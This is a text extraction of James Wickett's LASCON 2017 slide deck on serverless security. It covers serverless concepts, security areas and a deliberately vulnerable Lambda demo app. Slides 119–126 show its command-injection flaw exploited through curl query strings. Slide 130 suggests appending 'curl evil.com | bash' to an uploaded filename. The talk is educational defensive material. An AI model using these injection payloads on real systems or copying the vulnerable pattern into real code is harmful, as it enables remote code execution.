serverless security at lascon 2017

1. LASCON 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS JAMES WICKETT

2. LASCON 2017 @WICKETT Dont worry, this is not a thinly veiled vendor pitch.

3. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW? Send an email to [email protected]

4. LASCON 2017 @WICKETT HEAD OF RESEARCH AT SIGNAL SCIENCES DEVOPS DAYS AUSTIN ORGANIZER AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM JAMES WICKETT

5. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)

6. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)

7. LASCON 2017 @WICKETT WHAT IS SERVERLESS?

8. LASCON 2017 @WICKETT MISCONCEPTIONS

9. LASCON 2017 @WICKETT ITS MARKETING (CLOUD REBRANDED)

10. LASCON 2017 @WICKETT SERVERLESS == NO SERVERS

11. LASCON 2017 @WICKETT SERVERLESS == BACKEND AS A SERVICE

12. LASCON 2017 @WICKETT SERVERLESS == PLATFORM AS A SERVICE

13. LASCON 2017 @WICKETT TK: ADRIANCO QUOTE

14. LASCON 2017 @WICKETT SO, WHAT IS SERVERLESS?

15. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html @MIKEBROBERTS

16. LASCON 2017 @WICKETT

17. LASCON 2017 @WICKETT 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES LATE 2014 - AWS LAUNCHED LAMBDA JULY 2015 - AWS LAUNCHED API GATEWAY OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA 2015 TO PRESENT - FRAMEWORKS FORMING 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED 2016 - SERVERLESS CONFERENCES STARTED HISTORY OF SERVERLESS

18. LASCON 2017 @WICKETT VMsHardware Serverless Inspiration from @adrianco Waste Value

19. LASCON 2017 @WICKETT Decomposed Microservice Architecture

20. LASCON 2017 @WICKETT WHAT CAN WE SAY IS SERVERLESS?

21. LASCON 2017 @WICKETT SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)

22. LASCON 2017 @WICKETT CONTAINERS ON DEMAND

23. LASCON 2017 @WICKETT SERVERLESS IS (NO MANAGEMENT OF) SERVERS

24. LASCON 2017 @WICKETT SERVERLESS IS SERVICEFULL

25. LASCON 2017 @WICKETT SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS

26. LASCON 2017 @WICKETT If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/ @cloud_opinion/the-pattern- may-repeat-26de1e8b489d

27. LASCON 2017 @WICKETT THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS

28. LASCON 2017 @WICKETT SERVERLESS WILL COMPLETELY DISRUPT THE CONTAINER MARKET IN ONE, MAYBE TWO YEARS.

29. LASCON 2017 @WICKETT Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. SERVERLESS DEFINITION

30. LASCON 2017 @WICKETT SO, WHAT ARE THE UPSIDES?

31. LASCON 2017 @WICKETT SCALING BUILT IN

32. LASCON 2017 @WICKETT PAY FOR WHAT YOU USE IN 100MS INCREMENTS

33. LASCON 2017 @WICKETT WITH SERVERLESS SYSTEM ADMINISTRATION IS (MOSTLY) LOWER

34. LASCON 2017 @WICKETT SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS

35. LASCON 2017 @WICKETT YOU CAN SKIP DOCKERING ALL THE THINGS!

36. LASCON 2017 @WICKETT GREAT, WHATS THE CATCH?

37. LASCON 2017 @WICKETT Ops burden to rationalize serverless model @patrickdebois

39. LASCON 2017 @WICKETT VENDOR LOCK-IN

40. LASCON 2017 @WICKETT MONITORING

41. LASCON 2017 @WICKETT https://speakerdeck.com/smithclay/faas-measurement-fundamentals

42. LASCON 2017 @WICKETT https://speakerdeck.com/smithclay/faas-measurement-fundamentals

43. LASCON 2017 @WICKETT LOGGING

44. LASCON 2017 @WICKETT RELIABILITY

45. LASCON 2017 @WICKETT APP NEEDS LARGE LOCAL DISK SPACE LONG RUNNING JOBS BIG I/O TASKS LATENCY SENSITIVE REQUESTS THAT CANT WAIT FOR THE COLD-STARTUP TIME SERVERLESS DEAL KILLERS (MAYBE?)

46. LASCON 2017 @WICKETT SERVERLESS USE CASES

47. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html MESSAGE PROCESSING

48. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html API GATEWAY

49. LASCON 2017 @WICKETT WEB APPLICATIONS

50. LASCON 2017 @WICKETT CI/CD auth wordpress scraper event ingestion chatbots load testing MORE SERVERLESS USE CASES

51. LASCON 2017 @WICKETT Security

52. LASCON 2017 @WICKETT LETS TRY A SAMPLE APPLICATION IN AWS

53. LASCON 2017 @WICKETT SERVERLESS APEX GO SPARTA KAPPA STEP 1: PICK A FRAMEWORK

55. LASCON 2017 @WICKETT GOLANG! AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO SPARTA

56. LASCON 2017 @WICKETT CLOUDWATCH EVENTS AND LOGS DYNAMODB, KINESIS, S3 SES, SNS API GATEWAY CREATION GO SPARTA INCLUDES

57. LASCON 2017 @WICKETT BUILD A WORD CLOUD GENERATOR ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES RETURN JSON WITH COUNTS OF WORDS IN TEXT KEEP IT SIMPLE STEP 2: IDEA!

58. LASCON 2017 @WICKETT (USING GO SPARTA FOR THE FRAMEWORK) LAMBDA S3 API GATEWAY STEP 3: DESIGN AND ARCHITECTURE

60. LASCON 2017 @WICKETT STEP 4: WRITE THE HANDLER

61. LASCON 2017 @WICKETT STEP 5: SETUP API GATEWAY

62. LASCON 2017 @WICKETT STEP 6: SET THE CONFIG DETAILS

63. LASCON 2017 @WICKETT STEP 7: PROVISION YOUR APP!

64. LASCON 2017 @WICKETT STEP 8: SETUP STRICT IAM POLICIES

65. LASCON 2017 @WICKETT STEP 9: GIVE UP AND SET VERY BAD IAM POLICIES PROMISE TO FIX LATER

66. LASCON 2017 @WICKETT STEP 10: PROVISION YOUR APP!

67. LASCON 2017 @WICKETT APP IN AWS CONSOLE

68. LASCON 2017 @WICKETT TEST LAMBDA EXEC IN CONSOLE FIRST RUN OF 343MS

69. LASCON 2017 @WICKETT SECOND RUN ONLY TOOK 84MS

70. LASCON 2017 @WICKETT API GATEWAY IN CONSOLE

71. LASCON 2017 @WICKETT API GATEWAY EXECUTION IN CONSOLE

72. LASCON 2017 @WICKETT RETURNED JSON

73. LASCON 2017 @WICKETT MONITORING LAMBDA IN CONSOLE

74. LASCON 2017 @WICKETT YOU NEED A FRAMEWORK OR YOU DIE. WHY IS IAM SO HAAARRDD? WOW! I HAVE A FULLY ELASTIC, FAST API RUNNING ON THE INTERNET FOR BASICALLY NO COST. THIS IS GOING TO BE HUGE! OVERALL SERVERLESS EXPERIENCE

75. LASCON 2017 @WICKETT IS SECURITY READY FOR SERVERLESS?

77. LASCON 2017 @WICKETT SECURITY

78. LASCON 2017 @WICKETT many security teams work with a worldview where their goal is to inhibit change as much as possible

79. LASCON 2017 @WICKETT OLD PATH VS. NEW PATH Embrace Secrecy Create Feedback Loops Just Pass Audit! Compliance adds Value Enforce Stability Create Chaos Build a Wall Zero Trust Networks Slow Validation Fast and Non-blocking Certainty Testing Adversity Testing Test when Done Shift Left Process Driven The Paved Road

81. LASCON 2017 @WICKETT SECURE SOFTWARE SUPPLY CHAIN DELIVERY PIPELINE DATA FLOW SECURITY ATTACK DETECTION FOUR AREAS OF SERVERLESS SECURITY

82. LASCON 2017 @WICKETT source: @devsecops

83. LASCON 2017 @WICKETT THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE SURFACE AREA REDUCTION

84. LASCON 2017 @WICKETT TLS CONTROL TO THE PROVIDER ROUTING CONTROL TO THE PROVIDER CONSUMPTION OF THIRD PARTY SERVICES IAM ROLES AND POLICY CONFUSION SURFACE AREA EXPANSION

85. LASCON 2017 @WICKETT SSL / TLS FROM THE PROVIDER

86. LASCON 2017 @WICKETT OLD WAY NEW WAY

87. LASCON 2017 @WICKETT ROUTING FROM THE PROVIDER

88. LASCON 2017 @WICKETT ROUTING THE OLD WAY

89. LASCON 2017 @WICKETT ROUTING THE NEW WAY

90. LASCON 2017 @WICKETT Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0 SERVICE AND 3RD PARTY EXPANSION

91. LASCON 2017 @WICKETT https://media.ccc.de/v/33c3-7865- gone_in_60_milliseconds IAM ROLES AND POLICIES

92. LASCON 2017 @WICKETT Recommendation: Use a third-party service to monitor for provider cong changes

93. LASCON 2017 @WICKETT DISABLE ROOT ACCESS KEYS MANAGE USERS WITH PROFILES SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM SECURE KEYS IN DEV SYSTEM USE PROVIDER MFA USE GOOD HYGIENE WITH YOUR PROVIDER

94. LASCON 2017 @WICKETT DELIVERY PIPELINE SECURITY

96. LASCON 2017 @WICKETT UNIT TESTING

97. LASCON 2017 @WICKETT EASIER TO MOCK HARDER TO MOCK

98. LASCON 2017 @WICKETT UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER

99. LASCON 2017 @WICKETT USE OF A STAGING OR PRE-PROD ENV END TO END SYNTHETIC INTEGRATION TESTS ALL THE USUAL SUSPECTS INTEGRATION TESTING

100. LASCON 2017 @WICKETT CONFIGURATION IS PART OF DELIVERY

101. LASCON 2017 @WICKETT ONLY DEV KEYS CAN PUSH TO DEV ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE- PROD INTEGRATION TESTS MUST PASS IN THIS ENV SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM GOOD PIPELINE PRACTICES

102. LASCON 2017 @WICKETT BDD-SECURITY - GITHUB.COM/ CONTINUUMSECURITY/BDD-SECURITY GAUNTLT - GAUNTLT.ORG GITHUB.COM/GAUNTLT/GAUNTLT DOCKER RECOMMENDED SECURITY TESTING TOOLS

103. LASCON 2017 @WICKETT http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015 GAUNTLT WORKSHOP IN 9 EXAMPLES

104. LASCON 2017 @WICKETT DATA FLOW DEVELOPMENT DATA FLOW DIAGRAMS THREAT MODELING RUNTIME LOGGING CUSTOM MONITORS/ METRICS

105. LASCON 2017 @WICKETT Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting- serverless-architectures-and- security-254a0c12b54a

106. LASCON 2017 @WICKETT SPOOFING CONSUMED RESOURCES DENIAL OF SERVICE TIMEOUTS EXECUTION RESTRICTIONS FOR RESOURCES CAPACITY ISSUES DATA FLOW SECURITY

107. LASCON 2017 @WICKETT ATTACK DETECTION

108. LASCON 2017 @WICKETT DOES APPLICATION SECURITY STILL MATTER?

109. LASCON 2017 @WICKETT https://medium.com/ @PaulDJohnston/security-and- serverless-ec52817385c4

111. LASCON 2017 @WICKETT APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!

112. LASCON 2017 @WICKETT INSPIRED BY ALL THE GOATS

114. LASCON 2017 @WICKETT SERVERLESS HAS A FALSE SENSE OF SECURITY API PROXY LAYER THING PROTECTS ME, RIGHT? ;) WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS A VULNERABLE LAMBDA + API GATEWAY STACK BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS INTRODUCING LAMBHACK

116. LASCON 2017 @WICKETT A VULNERABLE LAMBDA + API GATEWAY STACK OPEN SOURCE, MIT LICENSED INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP GITHUB.COM/WICKETT/LAMBHACK github.com/wickett/lamback

117. LASCON 2017 @WICKETT lambhack is a vulnerable serverless lambda application It would certainly be a bad idea to base any coding patterns o what you see here.

119. LASCON 2017 @WICKETT WHY IS THIS BAD? command := lambdaEvent.QueryParams[args"] output := runner.Run(command)

120. LASCON 2017 @WICKETT With command execution available to us in lambhack, we can poke around the container a bit

121. LASCON 2017 @WICKETT UNAME -A $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

122. LASCON 2017 @WICKETT CAT /PROC/VERSION $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/ version;+sleep+1 > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

123. LASCON 2017 @WICKETT LETS LOOK IN /TMP $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64

124. LASCON 2017 @WICKETT LAMBDA REUSE IN ACTION! $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=ls+/tmp;+sleep+1" $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1 $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile

125. LASCON 2017 @WICKETT WHICH CURL $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=which+curl;+sleep+1" > /usr/bin/curl

126. LASCON 2017 @WICKETT GOT PROXY? $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=curl+https://www.example.com; +sleep+1" > "nnn Example Domainnn n n n n body {n background-color: #f0f0f2;n margin: 0;n padding: 0;n font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;n n }n div {n width: 600px;n margin: 5em auto;n padding: 50px;n background-color: #fff;n border-radius: 1em;n }n a:link, a:visited {n color: #38488f;n text-decoration: none;n }n @media (max-width: 700px) {n body {n background-color: #fff;n }n div {n width: auto;n margin: 0 auto;n border-radius: 0;n padding: 1em;n }n }n nnnn
n Example Domainn
This domain is established to be used for illustrative examples in documents. You may use thisn domain in examples without prior coordination or asking for permission.
n
More information...
n
nnn"

127. LASCON 2017 @WICKETT HELP NEEDED ADD XSS AND OTHER ATTACKS ADD AUTH VECTORS AND EXAMPLES NEEDS A UI PLEASE! PULL REQUESTS ACCEPTED :) FUTURE OF LAMBHACK

128. LASCON 2017 @WICKETT LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO MONITORING/LOGGING PLAYS A KEY ROLE HERE DETECT LONGER RUN TIMES HIGHER ERROR RATE OCCURRENCES DATA INGESTION LOG ACTIONS OF LAMBDAS APPSEC THOUGHTS

129. LASCON 2017 @WICKETT APPLICATION SECURITY IS STILL RELEVANT

130. LASCON 2017 @WICKETT New surface area, similar appsec problems Command Exec XSS Injection Attacks Try new things, e.g. appending curl evil.com | bash or alert(1) to a lename you upload on s3 TYPES OF ATTACKS

131. LASCON 2017 @WICKETT LOGGING, EMITTING EVENTS USAGE METRICS VANDIUM (SQLI) WRAPPER CONTENT SECURITY POLICY (CSP) API GATEWAYS ARE A GOOD PLACE TO ADD DEFENSE MORE THINGS NEED TO BE DONE HERE DEFENSE

132. LASCON 2017 @WICKETT Development in serverless is easier than ever, attracting new developers to web development, as a result, application security will see a rise. FINAL THOUGHT

134. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)

135. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)

136. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]

serverless security at lascon 2017

Software